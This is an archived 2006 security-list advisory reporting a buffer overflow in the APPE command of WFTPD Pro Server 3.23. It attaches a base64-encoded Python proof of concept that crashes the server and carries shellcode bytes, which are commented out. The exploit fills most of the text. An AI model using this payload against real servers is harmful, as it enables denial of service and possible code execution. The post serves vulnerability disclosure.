Date: Tue, 7 Nov 2006 10:26:29 +0100 (CET)
From: Joxean Koret <joxeankoret@yahoo.es.>
Subject: WFTPD Pro Server 3.23 Buffer Overflow
To: [email protected], [email protected]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1539039305-1162891589=:29996"
Content-Transfer-Encoding: 8bit
X-Virus-Scanned: antivirus-gw at tyumen.ru
--0-1539039305-1162891589=:29996
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Content-Id:
Content-Disposition: inline
WFTPD Pro Server 3.23 Buffer Overflow
A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwritting EIP
is quite easy but I'm too lazy...
Attached goes an (unfinished) POC.
Disclaimer
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------
Contact
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y mСviles desde 1 cИntimo por minuto.
http://es.voice.yahoo.com
--0-1539039305-1162891589=:29996
Content-Type: application/octet-stream; name="bof.py"
Content-Transfer-Encoding: base64
Content-Description: 846879707-bof.py
Content-Disposition: attachment; filename="bof.py"
IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgppbXBvcnQgc3lzCmltcG9ydCBzdHJ1
Y3QKaW1wb3J0IGZ0cGxpYgoKcHJpbnQgIldGVFBEIFBybyBTZXJ2ZXIgMy4y
My4xLjEgQnVmZmVyIE92ZXJmbG93IChPbmx5IGEgRE9TIGN1cnJlbnRseSwg
c2ltcGxlIFBPQykiCnByaW50ICJDb3B5cmlnaHQgKGMpIEpveGVhbiBLb3Jl
dCIKcHJpbnQKCnRhcmdldCA9ICIxOTIuMTY4LjEuMTMiCnRhcmdldFBvcnQg
PSAiMjEiCgp0cnk6CiAgICBmdHAgPSBmdHBsaWIuRlRQKCkKCiAgICBwcmlu
dCAiWytdIENvbm5lY3RpbmcgdG8gdGFyZ2V0ICIKICAgIG1zZyA9IGZ0cC5j
b25uZWN0KHRhcmdldCwgdGFyZ2V0UG9ydCkKICAgIHByaW50ICJbK10gT2su
IFRhcmdldCBiYW5uZXIiCiAgICBwcmludCBtc2cKICAgIHByaW50CiAgICBw
cmludCAiWytdIFRyeWluZyB0byBsb2dnaW5nIGFub255bW91c2x5IgogICAg
bXNnID0gZnRwLmxvZ2luKCkgIyBBbm9ueW1vdXMKICAgIHByaW50ICJbK10g
T2suIE1lc3NhZ2UiCiAgICBwcmludCBtc2cKICAgIHByaW50CmV4Y2VwdDoK
ICAgIHByaW50ICJbIV0gRXhwbG9pdCBkb2Vzbid0IHdvcmsuICIgKyBzdHIo
c3lzLmV4Y19pbmZvKClbMV0pCiAgICBzeXMuZXhpdCgwKQoKCmEgPSAiXFxc
XEE6IgoKZm9yIGkgaW4gcmFuZ2UoNik6CiAgICBhICs9IGEKCnByaW50ICJb
K10gUGFkZGluZyBsZW5ndGggIiArIHN0cihsZW4oYSkpICsgIiBieXRlcyIK
CmIgPSAiQUJDRCIKCmZvciBpIGluIHJhbmdlKDQpOgogICAgYiArPSBiCgph
ID0gYSArICJBQkNEIioxMCArIGIKCnNoZWxsQ29kZSA9ICIiCnNoZWxsQ29k
ZSArPSAiXHgyOVx4YzlceDgzXHhlOVx4YjBceGQ5XHhlZVx4ZDlceDc0XHgy
NFx4ZjRceDViXHg4MVx4NzNceDEzXHhlYyIKc2hlbGxDb2RlICs9ICJceDli
XHgyNlx4OGNceDgzXHhlYlx4ZmNceGUyXHhmNFx4MTBceGYxXHhjZFx4YzFc
eDA0XHg2Mlx4ZDlceDczIgpzaGVsbENvZGUgKz0gIlx4MTNceGZiXHhhZFx4
ZTBceGM4XHhiZlx4YWRceGM5XHhkMFx4MTBceDVhXHg4OVx4OTRceDlhXHhj
OVx4MDciCnNoZWxsQ29kZSArPSAiXHhhM1x4ODNceGFkXHhkM1x4Y2NceDlh
XHhjZFx4YzVceDY3XHhhZlx4YWRceDhkXHgwMlx4YWFceGU2XHgxNSIKc2hl
bGxDb2RlICs9ICJceDQwXHgxZlx4ZTZceGY4XHhlYlx4NWFceGVjXHg4MVx4
ZWRceDU5XHhjZFx4NzhceGQ3XHhjZlx4MDJceGE0IgpzaGVsbENvZGUgKz0g
Ilx4OTlceDdlXHhhZFx4ZDNceGM4XHg5YVx4Y2RceGVhXHg2N1x4OTdceDZk
XHgwN1x4YjNceDg3XHgyN1x4NjciCnNoZWxsQ29kZSArPSAiXHhlZlx4Yjdc
eGFkXHgwNVx4ODBceGJmXHgzYVx4ZWRceDJmXHhhYVx4ZmRceGU4XHg2N1x4
ZDhceDE2XHgwNyIKc2hlbGxDb2RlICs9ICJceGFjXHg5N1x4YWRceGZjXHhm
MFx4MzZceGFkXHhjY1x4ZTRceGM1XHg0ZVx4MDJceGEyXHg5NVx4Y2FceGRj
IgpzaGVsbENvZGUgKz0gIlx4MTNceDRkXHg0MFx4ZGZceDhhXHhmM1x4MTVc
eGJlXHg4NFx4ZWNceDU1XHhiZVx4YjNceGNmXHhkOVx4NWMiCnNoZWxsQ29k
ZSArPSAiXHg4NFx4NTBceGNiXHg3MFx4ZDdceGNiXHhkOVx4NWFceGIzXHgx
Mlx4YzNceGVhXHg2ZFx4NzZceDJlXHg4ZSIKc2hlbGxDb2RlICs9ICJceGI5
XHhmMVx4MjRceDczXHgzY1x4ZjNceGZmXHg4NVx4MTlceDM2XHg3MVx4NzNc
eDNhXHhjOFx4NzVceGRmIgpzaGVsbENvZGUgKz0gIlx4YmZceGM4XHg2NVx4
ZGZceGFmXHhjOFx4ZDlceDVjXHg4YVx4ZjNceDM3XHhkMFx4OGFceGM4XHhh
Zlx4NmQiCnNoZWxsQ29kZSArPSAiXHg3OVx4ZjNceDgyXHg5Nlx4OWNceDVj
XHg3MVx4NzNceDNhXHhmMVx4MzZceGRkXHhiOVx4NjRceGY2XHhlNCIKc2hl
bGxDb2RlICs9ICJceDQ4XHgzNlx4MDhceDY1XHhiYlx4NjRceGYwXHhkZlx4
YjlceDY0XHhmNlx4ZTRceDA5XHhkMlx4YTBceGM1IgpzaGVsbENvZGUgKz0g
Ilx4YmJceDY0XHhmMFx4ZGNceGI4XHhjZlx4NzNceDczXHgzY1x4MDhceDRl
XHg2Ylx4OTVceDVkXHg1Zlx4ZGIiCnNoZWxsQ29kZSArPSAiXHgxM1x4NGRc
eDczXHg3M1x4M2NceGZkXHg0Y1x4ZThceDhhXHhmM1x4NDVceGUxXHg2NVx4
N2VceDRjXHhkYyIKc2hlbGxDb2RlICs9ICJceGI1XHhiMlx4ZWFceDA1XHgw
Ylx4ZjFceDYyXHgwNVx4MGVceGFhXHhlNlx4N2ZceDQ2XHg2NVx4NjRceGEx
IgpzaGVsbENvZGUgKz0gIlx4MTJceGQ5XHgwYVx4MWZceDYxXHhlMVx4MWVc
eDI3XHg0N1x4MzBceDRlXHhmZVx4MTJceDI4XHgzMFx4NzMiCnNoZWxsQ29k
ZSArPSAiXHg5OVx4ZGZceGQ5XHg1YVx4YjdceGNjXHg3NFx4ZGRceGJkXHhj
YVx4NGNceDhkXHhiZFx4Y2FceDczXHhkZCIKc2hlbGxDb2RlICs9ICJceDEz
XHg0Ylx4NGVceDIxXHgzNVx4OWVceGU4XHhkZlx4MTNceDRkXHg0Y1x4NzNc
eDEzXHhhY1x4ZDlceDVjIgpzaGVsbENvZGUgKz0gIlx4NjdceGNjXHhkYVx4
MGZceDI4XHhmZlx4ZDlceDVhXHhiZVx4NjRceGY2XHhlNFx4MWNceDExXHgy
Mlx4ZDMiCnNoZWxsQ29kZSArPSAiXHhiZlx4NjRceGYwXHg3M1x4M2NceDli
XHgyNlx4OGMiCgphID0gYSArICJKT1hFQU4iICMrIHNoZWxsQ29kZQoKcHJp
bnQgIlsrXSBFeHBsb2l0aW5nIHdpdGggYSBidWZmZXIgb2YgIiArIHN0cihs
ZW4oYSkpICsgIiBieXRlKHMpIC4uLiAiCgp0cnk6CiAgICBtc2cgPSBmdHAu
c2VuZGNtZCgiQVBQRSAiICsgYSkKICAgIHByaW50ICJbIV0gRXhwbG9pdCBk
b2Vzbid0IHdvcmsgWyIgKyBtc2cgKyAiXSIKZXhjZXB0OgogICAgcHJpbnQg
IlsrXSBFeHBsb2l0IGFwcGFyZW50bHkgd29ya3MuIFRyeWluZyB0byB2ZXJp
ZnkgaXQgLi4uICIKCiAgICB0cnk6CiAgICAgICAgZnRwLmNvbm5lY3QodGFy
Z2V0LCB0YXJnZXRQb3J0KQogICAgICAgIHByaW50ICJbIV0gTm8sIGl0IGRv
ZXNuJ3Qgd29yayBbIiArIHN0cihzeXMuZXhjX2luZm8oKVsxXSkgKyAiXSA6
KCIKICAgIGV4Y2VwdDoKICAgICAgICBwcmludCAiWyFdIE9rLiBTZXJ2ZXIg
aXMgZGVhZCwgZXhwbG9pdCBzdWNjZXNzZnVsbHkgZXhlY3V0ZWQuICIKCg==
--0-1539039305-1162891589=:29996--
